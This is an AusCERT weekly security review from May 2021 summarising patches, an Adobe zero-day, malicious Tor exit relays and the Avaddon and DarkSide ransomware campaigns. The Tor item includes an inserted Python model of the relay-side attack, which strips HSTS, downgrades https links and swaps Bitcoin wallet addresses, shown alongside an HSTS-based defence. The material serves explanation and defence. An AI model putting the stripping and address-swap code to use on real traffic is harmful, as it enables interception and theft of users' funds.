Week in review - 14 May 2021
AusCERT Week in Review for 14th May 2021
What a week! (although it certainly feels like we’ve been saying this a bit in 2021)
To kick things off, we celebrated the 20th anniversary of our annual conference AusCERT2021. It’s been a week of awesome catch-ups and learnings from the various presentation sessions on the conference program. Thank you so much for the support of our wonderful sponsors and delegates. We hope you enjoyed coming back together in-person as much as the AusCERT team did. For those who couldn’t make it, we will be sharing the content from the conference in due time via our YouTube channel.
We hope folks were able to get through all of May 2021’s Patch Tuesday fixes, please refer to our highlighted bulletins and articles below.
Thrilled to announce that we’ve now officially launched our AusCERT podcast, “Share today, save tomorrow” – a special shout out to our ex-colleague Nick Soysa for coining this phrase. Episode 1 is now available on our website here.
Last but not least, thank you for supporting AusCERT taking over the @WeAreBrisbane Twitter account this week, we hope that was an educational one for those who play in the Twitter space.
Until next week everyone, have a wonderful weekend – to our colleagues and followers of Muslim faith, Happy Eid ul Fitr, Eid Mubarak!
Microsoft's May 2021 Patch Tuesday: 55 flaws fixed, four critical
Microsoft's May Patch Tuesday release included patches for 55 CVEs, four of them rated critical. Three of the bugs were zero-days in the sense of having been publicly disclosed before the patch shipped, but none is known to have been exploited in the wild.
Products impacted include Internet Explorer, .NET Core and Visual Studio, Windows 10 and Office, to name a few. You can find the updates for May here.
The fixed zero-day bugs are:
- CVE-2021-31204 .NET and Visual Studio Elevation of Privilege Vulnerability
- CVE-2021-31207 Microsoft Exchange Server Security Feature Bypass Vulnerability
- CVE-2021-31200 Common Utilities Remote Code Execution Vulnerability
Hackers Leverage Adobe Zero-Day Bug Impacting Acrobat Reader
A patch for Adobe Acrobat, the world’s leading PDF reader, fixes a vulnerability (CVE-2021-28550) that is under active attack, affects both Windows and macOS systems, and could lead to arbitrary code execution.
Adobe is warning customers of a critical zero-day bug actively exploited in the wild that affects its ubiquitous Adobe Acrobat PDF reader software. A patch is available, as part of the company’s Tuesday roundup of 43 fixes for 12 of its products, including Adobe Creative Cloud Desktop Application, Illustrator, InDesign, and Magento.
Attackers added thousands of Tor exit nodes to carry out SSL stripping attacks
Author: Security Affairs
Starting from January 2020, a threat actor has been adding thousands of malicious exit relays to the Tor network to intercept traffic and carry out SSL stripping attacks on users accessing cryptocurrency mixing websites, The Record first reported.
SSL stripping (aka an SSL downgrade attack) lets an attacker sitting on the path between client and server downgrade a connection from HTTPS to plaintext HTTP, exposing the traffic to eavesdropping and manipulation. An exit relay is an ideal place to do this: it is the last Tor hop, so it sees the client's request to the destination site and can answer it, or rewrite the site's answer, before anything reaches the user.
In the attacks against the Tor network, the threat actor used that plaintext position to replace the addresses of legitimate wallets in the mixing sites' pages with addresses under the attacker's control, hijacking the transactions.
In August 2020, the security researcher and Tor node operator “Nusenu” described this practice in an analysis on how malicious Tor Relays are exploiting users in 2020.
Nusenu has now published a new part of that research showing that the threat actor is still active.
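To make the two halves of the attack concrete, here is an added Python model (not code from the Security Affairs article, The Record, or Nusenu's research) that runs on a constructed HTTP response: what a malicious exit relay does to a response once it has terminated TLS itself and is relaying a plaintext copy, and the client-side HSTS / HTTPS-only check that denies it the opportunity. The hostname `mixer.example`, the page contents and the wallet addresses are all made up for the example.

```python
import re

# Constructed sample: the response a mixing site would return over HTTPS, as
# the exit relay sees it after terminating TLS itself. Hostname, page and
# wallet address are made up for this example.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Strict-Transport-Security: max-age=31536000\r\n"
    b"\r\n"
    b"<html><body>"
    b"<a href=\"https://mixer.example/deposit\">Deposit</a>"
    b"<p>Send funds to 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2</p>"
    b"</body></html>"
)

# Shape of a legacy (P2PKH/P2SH) Bitcoin address; sufficient for the demo.
BTC_ADDR = re.compile(rb"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")


def split_response(raw):
    """Parse a raw HTTP/1.1 response into (status line, header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def ssl_strip(raw):
    """Model of the relay-side rewrite: drop the HSTS header so the browser
    never learns to insist on TLS, downgrade any redirect, and rewrite
    https:// links in the body so every later navigation is plaintext too."""
    status, headers, body = split_response(raw)
    headers.pop(b"strict-transport-security", None)
    if b"location" in headers:
        headers[b"location"] = headers[b"location"].replace(b"https://", b"http://", 1)
    body = body.replace(b"https://", b"http://")
    return status, headers, body


def swap_wallets(body, attacker_addr):
    """Once the page is plaintext, swapping the payout address is a plain substitution."""
    return BTC_ADDR.sub(attacker_addr, body)


class HstsClient:
    """Client-side defence: remember hosts that sent HSTS over a genuine TLS
    connection and refuse plaintext to them afterwards. A browser in
    HTTPS-only mode goes further and refuses plaintext to every host."""

    def __init__(self, https_only=False):
        self.https_only = https_only
        self.pinned = set()

    def observe(self, host, headers):
        if b"strict-transport-security" in headers:
            self.pinned.add(host)

    def allow_plaintext(self, host):
        if self.https_only:
            return False
        return host not in self.pinned


if __name__ == "__main__":
    _, hdrs, body = ssl_strip(SAMPLE_RESPONSE)
    print(swap_wallets(body, b"1AttackerAttackerAttackerAttackerA").decode())
```

The point of the `HstsClient` half is the caveat that matters for Tor users: HSTS only protects a host the browser has already seen over a genuine TLS connection (or that is on the preload list), so a first visit through a malicious exit is still exposed unless the browser refuses plaintext outright, which is what an HTTPS-only setting does.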
US and Australia warn of escalating Avaddon ransomware attacks
Author: Bleeping Computer
The Federal Bureau of Investigation and the Australian Cyber Security Centre are warning of an ongoing Avaddon ransomware campaign targeting organizations from an extensive array of sectors in the US and worldwide.
The FBI said in a TLP:GREEN flash alert last week that Avaddon ransomware affiliates are trying to breach the networks of manufacturing, healthcare, and other private sector organizations around the world.
The ACSC expanded on the targeting information, saying that the ransomware gang's affiliates are targeting entities from a wide range of sectors, including but not limited to government, finance, law enforcement, energy, information technology, and health.
A Closer Look at the DarkSide Ransomware Gang
Author: Krebs on Security
The FBI confirmed this week that a relatively new ransomware group known as DarkSide is responsible for an attack that caused Colonial Pipeline to shut down 5,550 miles of pipe, stranding countless barrels of gasoline, diesel and jet fuel on the Gulf Coast. Here’s a closer look at the DarkSide cybercrime gang, as seen through their negotiations with a recent U.S. victim that earns $15 billion in annual revenue.
New York City-based cyber intelligence firm Flashpoint said its analysts assess with a moderate-strong degree of confidence that the attack was not intended to damage national infrastructure and was simply associated with a target which had the finances to support a large payment.
“This would be consistent with DarkSide’s earlier activities, which included several ‘big game hunting’ attacks, whereby attackers target an organization that likely possesses the financial means to pay the ransom demanded by the attackers,” Flashpoint observed.
The DarkSide of the Ransomware Pipeline
If you want to quickly find out how to use Splunk to find activity related to the DarkSide Ransomware, skip to the “Detection and Remediation of DarkSide” section.
Otherwise, read on for a quick breakdown of what happened to the Colonial Pipeline, how to detect the ransomware, and view MITRE ATT&CK mappings.
Adobe reports that CVE-2021-28550 has been exploited in the wild that could lead to arbitrary code execution.
Serious vulnerabilities identified in the Exim mail server allowing remote attackers to gain complete root privileges.
Microsoft releases its monthly security patch update for the month of May 2021 resolving 12 vulnerabilities.
Multiple vulnerabilities in libgetdata are addressed by Debian's security updates.
Microsoft's latest security patches fix multiple vulnerabilities in Developer Tools.
Stay safe, stay patched and have a good weekend!
The AusCERT team